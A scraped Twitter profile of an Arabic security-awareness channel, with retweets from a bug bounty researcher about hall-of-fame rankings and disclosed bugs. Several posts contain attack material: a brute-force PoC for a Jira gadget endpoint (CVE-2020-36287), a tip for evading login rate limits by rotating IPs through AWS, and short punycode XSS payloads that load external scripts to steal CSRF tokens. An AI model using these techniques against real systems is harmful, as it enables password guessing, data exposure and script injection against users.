UpdateLap's profile picture. نهدف لزيادةالوعي في شتى مجالات امن المعلومات وحمايتها وأختراقها لرقي بالمستوى العربي الى مصاف الدول المتقدمة بالفكرالرقمي وحقوق الانترنت
http://FB.com/100002271816418

Update - أب ديت

@UpdateLap

نهدف لزيادةالوعي في شتى مجالات امن المعلومات وحمايتها وأختراقها لرقي بالمستوى العربي الى مصاف الدول المتقدمة بالفكرالرقمي وحقوق الانترنت http://FB.com/100002271816418

Ghim

أول أردني في قاعة الشهرة الخاصة بـGoogle الHall of Fame قامت شركة @GoogleVRP بأدراج أسمي الى قاعة الشهرة الـHOFالمخصصة لمكتشفي الثغرات في برنامجهاBughunter programوحصلت على المركز "204" عالميا من أصل1300باحث امني، بثغره واحده فقط أصبحت في طليعة القائمة bughunter.withgoogle.com/rank/hof/5

UpdateLap's tweet image. أول أردني في قاعة الشهرة الخاصة بـGoogle الHall of Fame
قامت شركة @GoogleVRP بأدراج أسمي الى قاعة الشهرة الـHOFالمخصصة لمكتشفي الثغرات في برنامجهاBughunter programوحصلت على المركز "204" عالميا من أصل1300باحث امني، بثغره واحده فقط أصبحت في طليعة القائمة 

bughunter.withgoogle.com/rank/hof/5
UpdateLap's tweet image. أول أردني في قاعة الشهرة الخاصة بـGoogle الHall of Fame
قامت شركة @GoogleVRP بأدراج أسمي الى قاعة الشهرة الـHOFالمخصصة لمكتشفي الثغرات في برنامجهاBughunter programوحصلت على المركز "204" عالميا من أصل1300باحث امني، بثغره واحده فقط أصبحت في طليعة القائمة 

bughunter.withgoogle.com/rank/hof/5

Update - أب ديت đã đăng lại

جعفر أبو الندى هكر أردني هاد الشب ال اردني بلغ عن 6 ثغرات أمنية في قوقل وعلى اثرها تعاقد مع فيس بوك ولثلاث سنوات كان بقائمة الشرف وبلغ عن 25 ثغرة في الفيس بوك youtu.be/SxYt4KlRv5k @Jafar_Abo_Nada

alghorsi83's tweet card. جعفر أبو الندى هكر أردني

youtube.com

YouTube

جعفر أبو الندى هكر أردني


تقوم الحكوم البريطانية بحملة ضد تقنيات التشفير المستخدمة في "WhatsApp" updatelap.com/2022/01/Britis…


تُصدر Apple تصحيح عاجل لثغرات 0-Day لأجهزة Mac و iPhone و iPad updatelap.com/2021/07/Apple-… #Apple #ZeroDay #bug

UpdateLap's tweet image. تُصدر Apple تصحيح عاجل لثغرات 0-Day لأجهزة Mac و iPhone و iPad

updatelap.com/2021/07/Apple-…

#Apple #ZeroDay #bug

يمكن لجميع متابعين قناة أب ديت الان الانتساب الى برنامج العضويات في القناة للحصول على المحتوى و المقابلات و الاستشارات الحصريه. youtube.com/c/updatelap/jo…

UpdateLap's tweet image. يمكن لجميع متابعين قناة أب ديت الان الانتساب الى برنامج العضويات في القناة للحصول على المحتوى و المقابلات و الاستشارات الحصريه. 

youtube.com/c/updatelap/jo…

لماذا تقوم شركة قوقل بتصوير غزة وكامل الاراضي الفلسطينية المحتله بشكل ضبابي ؟! youtu.be/F08YDrY_vOw #Gaza

UpdateLap's tweet image. لماذا تقوم شركة قوقل بتصوير غزة وكامل الاراضي الفلسطينية المحتله بشكل ضبابي ؟!

youtu.be/F08YDrY_vOw
#Gaza
UpdateLap's tweet image. لماذا تقوم شركة قوقل بتصوير غزة وكامل الاراضي الفلسطينية المحتله بشكل ضبابي ؟!

youtu.be/F08YDrY_vOw
#Gaza
UpdateLap's tweet image. لماذا تقوم شركة قوقل بتصوير غزة وكامل الاراضي الفلسطينية المحتله بشكل ضبابي ؟!

youtu.be/F08YDrY_vOw
#Gaza

Update - أب ديت đã đăng lại

Thank god, I am proud to be [Ranked 5th] in the world among the #Top_10 security researchers in the month of [May/2021] on the [Bugcrowd Leaderboard] Check out the @bugcrowd top 10: bugcrowd.com/leaderboard MY BC Account: bugcrowd.com/UpdateLap #kickass #ItTakesACrowd

Jafar_Abo_Nada's tweet image. Thank god, I am proud to be [Ranked 5th] in the world among the #Top_10 security researchers in the month of [May/2021] on the [Bugcrowd Leaderboard]

Check out the @bugcrowd top 10: bugcrowd.com/leaderboard
MY BC Account:
bugcrowd.com/UpdateLap

#kickass #ItTakesACrowd

Update - أب ديت đã đăng lại

Rank 5th at🛡️[Atlassian bug bounty program]🛡️ Thanks god, Extremely happy and Proud to Announce that I have been listed at the #TOP_10 security researchers in the world on [@Atlassian Hall Of Fame] MY BC Account: bugcrowd.com/UpdateLap #BugBounty #bug

Jafar_Abo_Nada's tweet image. Rank 5th at🛡️[Atlassian bug bounty program]🛡️

Thanks god, Extremely happy and Proud to Announce that I have been listed at the #TOP_10 security researchers in the world on [@Atlassian Hall Of Fame]

MY BC Account: bugcrowd.com/UpdateLap

#BugBounty #bug

Update - أب ديت đã đăng lại

This is exploit bug that I discovered in jira PoC CVE-2020-36287 Brute Force <GadgetId> start from 10000 to 19999 {BaseUrl}/rest/dashboards/1.0/10000/gadget/<GadgetId>/prefs If server response 401 bug Fixed, If the server's response is 200, the response will contain XML data

Jafar_Abo_Nada's tweet image. This is exploit bug that I discovered in jira

PoC CVE-2020-36287 

Brute Force &amp;lt;GadgetId&amp;gt; start from 10000 to 19999

{BaseUrl}/rest/dashboards/1.0/10000/gadget/&amp;lt;GadgetId&amp;gt;/prefs

If server response 401 bug Fixed, If the server&apos;s response is 200, the response will contain XML data

Update - أب ديت đã đăng lại

We just disclosed this beautifully written report and proof of concept from @Jafar_Abo_Nada: hackerone.com/reports/1103582. Especially appreciated the additional feedback we got after mitigating the initial vulnerability. It’s worth reading!


Update - أب ديت đã đăng lại

HackerOne Jira integration plugin Leaked JWT to unauthorized Jira users. Bounty: $3,000 #hackerone #bugbounty hackerone.com/reports/1103582


Update - أب ديت đã đăng lại

Thanks god, Extremely happy and Proud to Announce that Listed on #TOP_10 at @Bugcrowd Leaderboard for the month of March/2020. الحمد لله، بعد توفيق من الله وشهر مليء بالمنافسة، فخور بإدراجي ضمن ال Top_10 في [Bugcrowd Leaderboard] لشهر مارس bugcrowd.com/leaderboard

Jafar_Abo_Nada's tweet image. Thanks god, Extremely happy and Proud to Announce that Listed on #TOP_10 at @Bugcrowd Leaderboard for the month of March/2020.

الحمد لله، بعد توفيق من الله وشهر مليء بالمنافسة، فخور بإدراجي ضمن ال Top_10 في [Bugcrowd Leaderboard] لشهر مارس 

bugcrowd.com/leaderboard

Update - أب ديت đã đăng lại

Thank God, I Got Acknowledgement by @Hacker0x01 After I discovered a bug in the integration process on H1 platform. The #bug found as a result of a mistake in authorizations configuration. which leads to the leakage of the JWT Token to unauthorized user Big Thanks: @jobertabma

Jafar_Abo_Nada's tweet image. Thank God, I Got Acknowledgement by @Hacker0x01 After I discovered a bug in the integration process on  H1 platform. The #bug found as a result of a mistake in authorizations configuration. which leads to the leakage of the JWT Token to unauthorized user

Big Thanks: @jobertabma
Jafar_Abo_Nada's tweet image. Thank God, I Got Acknowledgement by @Hacker0x01 After I discovered a bug in the integration process on  H1 platform. The #bug found as a result of a mistake in authorizations configuration. which leads to the leakage of the JWT Token to unauthorized user

Big Thanks: @jobertabma

Update - أب ديت đã đăng lại

Thanks God, I got acknowledged by @Atlassian after discovering a security issue in a jira cloud. Bug type #SXSS This would allow a malicious app to bypass sandbox (as the XSS fires with-in the host app). and attacker can used this #bug with non-malicious apps as a #XSS vector.

Jafar_Abo_Nada's tweet image. Thanks God, I got acknowledged by @Atlassian after discovering a security issue in a  jira cloud. Bug type #SXSS This would allow a malicious app to bypass sandbox (as the XSS fires with-in the host app). and attacker can used this #bug with non-malicious apps as a #XSS vector.

Update - أب ديت đã đăng lại

Twitter disclosed a bug submitted by @UpdateLap: hackerone.com/reports/819930 - Bounty: $420 #hackerone #bugbounty

disclosedh1's tweet image. Twitter disclosed a bug submitted by @UpdateLap: hackerone.com/reports/819930 - Bounty: $420 #hackerone #bugbounty

Update - أب ديت đã đăng lại

Third bug in Twitter. Tips You are trying to guess the password on the login page, but the ip was blocked after several attempts 1bypass. Go to amazon, create account. 2From EC2 APIgateway get secret/access key 3In burp pro install ip rotate and past AWS key. Run attack. enjoy.

Jafar_Abo_Nada's tweet image. Third bug in Twitter.
Tips
You are trying to guess the password on the login page, but the ip was blocked after several attempts
1bypass. Go to amazon, create account.
2From EC2 APIgateway  get secret/access key
3In burp pro install ip rotate and past AWS key.
Run attack. enjoy.

Update - أب ديت đã đăng lại

#XSS Short payload 19char using #Punycode attack&without Space xss vector using emoji punycode <img/src=//🤣.io> <iframe/src=//l❤️.io> <script/src=//㎠.㎺> It's auto translated to cm2.pw by browsers HTML injection to steal CSRF token/attack. <img/src='//x.me


جوجل تقدم أعتذار للمستخدمين بسبب تسريب صورهم الخاصة. updatelap.com/2020/02/Google…

UpdateLap's tweet image. جوجل تقدم أعتذار للمستخدمين بسبب تسريب صورهم الخاصة.

updatelap.com/2020/02/Google…

Loading...

Something went wrong.


Something went wrong.